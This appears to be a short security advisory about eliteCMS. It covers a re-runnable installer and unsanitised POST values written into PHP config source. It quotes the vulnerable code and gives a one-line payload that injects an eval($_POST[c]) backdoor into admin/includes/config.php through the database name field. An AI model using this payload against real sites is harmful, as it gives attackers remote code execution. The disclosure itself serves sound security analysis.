eliteCMS's installer is not locked after installation completes, so an attacker can re-run the installation simply by visiting the installer URL.
A second vulnerability is that the installer lets a one-line backdoor be written directly into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... omitted ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values are interpolated straight into PHP source with no escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // the assembled source is written to config.php as-is
    $writer = fopen($file, 'w');
...

Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken from the POST request without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the string breaks out of the define() literal and a one-line backdoor is written into /admin/includes/config.php.